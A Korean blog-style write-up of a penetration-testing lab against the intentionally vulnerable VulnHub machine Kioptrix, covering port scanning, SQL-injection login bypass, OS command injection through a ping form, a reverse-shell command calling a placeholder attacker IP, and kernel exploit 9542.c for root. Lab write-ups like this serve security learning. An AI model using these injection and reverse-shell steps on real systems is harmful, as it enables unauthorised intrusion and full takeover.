[모의해킹] Kioptrix Level1.1 침투 테스트

vulnhub에서 제공하는 취약한 시스템인 kioptrix level1을 사용하여, 침투테스트를 실습해 보았다.

---

● 정보 수집 : Nmap, netdiscover
● 취약 스캐닝 : searchsploit

수집정보
1. OpenPort : 22, 80, ,111 443, 631, 851, 3306
2. OpenSSH 3.9p1, Apache 2.0.52 CUPS 1.1, 커널 버전 2.6.9-55, CentOS 버전 4.5(Final) 등등
3. ipp, mysql 서비스 사용

---

네트워크 대역에 타깃시스템이 존재하므로, 동일 네트크에서의 타겟 시스템을 식별했다.

172.30.1.25로 확인되며, Nmap을 통해 정보수집을 진행했다.

간단한 정보를 스캐닝했을 때 위와 같은 서비스 들이 동작하는 것을 확인할 수 있었다.

ssh, http, rpc, ssl, ipp, mysql 등의 서비스들이 실행 중이었으며, 

openshh의 경우 username에 대한 열거 취약점 외에 특이 취약점은 존재하지 않았으며,

해당 문제에서는 80번 http서비스가 실행 중이므로, 웹 서비스 측면에서의 침투로의 방향성을 잡았다.

 

해당 주소로 웹 접속을 시도하면, 원격 시스템 관련 관리자 로그인 페이지가 출력되며, 해당 페이지를 보자마자

SQL Injection 으로의 침투 과정이고라고 생각됐다. 우선 '(싱글쿼터)와 같이 논리적 오류를 유발했지만, 아무런 변화가 없었다.

위와 같이  SQL Injection을 통해 참으로 만든 쿼리를 보낸 결과

로그인에 성공하고 위와 같은 페이지로 이동했다.

이로 써 해당 로그인 페이지에서는 SQLI의 취약점이 존재했으며, USER가 저장되어 있는 테이블 최 상단에

admin 계정이 있었던 걸로 추정된다.

우선 이동된 페이지를 보면 ping 테스트를 위한 설정이 되어있으며, 이는 OS Injection의 잠재적 취약점이 된다.

테스트를 위해 127.0.0.1; ls를 입력하였더니 아래와 같이 예상대로 OS Injection으로 공격이 가능했다.

이제 Reverse Shell 연결을 통해 내부로 침투가 가능하다.

공격자 pc에서 nc를 통해 특정 포트를 열고 대기하고

시스템명령어를 통해 ping 테스트 구문 뒤에 bash -i /dev/tcp/[공격자 ip]/[port] 0>&1을 통해 리버스연결을 시도했다.

시스템 내부에 성공적으로 침투했으며,

이제 시스템 내부에서의 커널 취약점 및 내부설정 미흡으로 인한 취약점이 있는지 식별 후 

권한 상승을 시도했다.

커널 버전은 2.6.9-55, CentOS 버전은 4.5(Final) 그리고 현재 OS의 비트 스는 32비트 운영체제 인 걸 확인했다.

이를 통해 취약점이 있는지 살펴봤다.

Searchsploit를 통해 검색 결과 가장 유력해 보이는 익스코드로는 9542.c로 보여 해당 코드를 사용해 보기로 했다.

공격자 pc에서 아파치 웹 서버를 가동시켜 해당 공격 c파일을 업로드 후 

피해자 pc에서 받아온 후 컴파일 후 실행시켜 성공적으로 root 권한을 획득했다.

 

 

 

해당 파일을 실행시키면 즉시 root (관리자) 쉘을 획득할 수 있다.

 

※ 내용이 이상하거나 문제가 있을 경우, 또는 설명에 부족한 내용이 있으시면 알려 주시면 감사합니다.